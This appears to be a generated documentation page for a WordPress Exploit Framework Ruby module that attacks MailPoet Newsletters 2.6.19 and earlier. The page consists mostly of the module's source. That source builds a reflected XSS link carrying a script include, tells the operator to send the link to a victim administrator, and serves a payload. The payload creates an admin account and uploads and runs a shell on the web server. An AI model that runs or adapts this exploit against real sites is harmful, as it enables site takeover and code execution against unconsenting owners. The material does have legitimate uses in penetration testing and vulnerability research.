class Wpxf::Exploit::MailpoetNewslettersReflectedXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/reflected/mailpoet_newsletters_reflected_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'MailPoet Newsletters <= 2.6.19 Reflected XSS Shell Upload',
    desc: 'This module prepares a payload and link that can be sent to an '\
          'admin user which when visited with a valid session will create '\
          'a new admin user which will be used to upload and execute the '\
          'selected payload in the context of the web server.',
    author: [
      'Netsparker', # Discovery and disclosure
      'rastating'   # WPXF module
    ],
    references: [
      ['WPVDB', '8373'],
      ['URL', 'https://www.netsparker.com/ns-16-002-xss-vulnerability-identified-in-mailpoet-newsletters/']
    ],
    date: 'Feb 02 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/mailpoet_newsletters_reflected_xss_shell_upload.rb, line 27
def check
  check_plugin_version_from_readme('wysija-newsletters', '2.7')
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/reflected/mailpoet_newsletters_reflected_xss_shell_upload.rb, line 37
def run
  return false unless super

  @success = false
  emit_info 'Provide the URL below to the victim to begin the payload upload'
  puts
  puts url_with_xss
  puts

  start_http_server
  return @success
end
url_with_xss() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/mailpoet_newsletters_reflected_xss_shell_upload.rb, line 31
def url_with_xss
  "#{full_uri}?wysija-page=1&controller=confirm&wysija-key='"\
  "\"--></style></script><script>#{xss_ascii_encoded_include_script}"\
  '</script>&action=unsubscribe&demo=1&wysijap=subscriptions'
end